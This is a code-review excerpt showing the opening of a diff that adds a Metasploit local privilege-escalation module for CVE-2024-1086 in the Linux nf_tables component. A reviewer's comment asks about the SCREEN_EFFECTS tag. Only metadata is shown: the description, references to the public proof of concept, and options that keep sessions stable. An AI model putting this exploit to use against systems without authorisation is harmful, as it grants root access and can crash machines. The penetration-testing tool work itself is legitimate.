modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb

```diff
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Compile
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netfilter nf_tables Linux Priv Esc',
+        'Description' => %q{
+          A use-after-free vulnerability in the Linux kernels netfilter: nf_tables component can be
+          exploited to achieve local privilege escalation. The nft_verdict_init() function allows
+          positive values as drop error within the hook verdict, and hence the nf_hook_slow() function
+          can cause a double free vulnerability when NF_DROP is issued with a drop error which
+          resembles NF_ACCEPT.
+
+          Devices with a WiFi interface will likely be unstable with this exploit and crash.
+
+          Successful exploitation will likely crash the original shell.
+
+          Failed exploitation will likely HARD crash the system or put it into an unreliable state
+          and it will need a physical reset/reboot. Attempted re-exploitation without a reboot will
+          hard crash the system.
+
+          Tested against a VM of Ubuntu 22.04 (Linux 5.15.0-60-generic)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Notselwyn' # original PoC
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://pwning.tech/nftables/'],
+          [ 'URL', 'https://github.com/Notselwyn/CVE-2024-1086'],
+          [ 'CVE', '2024-1086']
+        ],
+        'DefaultOptions' => {
+          # without these the system seems to hard crash in 2-6min
+          # with these i've had both shells and the system stable for over an hour
+          'PrependMigrate' => true,
+          'PrependFork' => true
+        },
+        'DisclosureDate' => '2024-01-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
```

Comment:
Is `SCREEN_EFFECTS` due to the system locking up here? If not would you mind dropping a comment to clarify.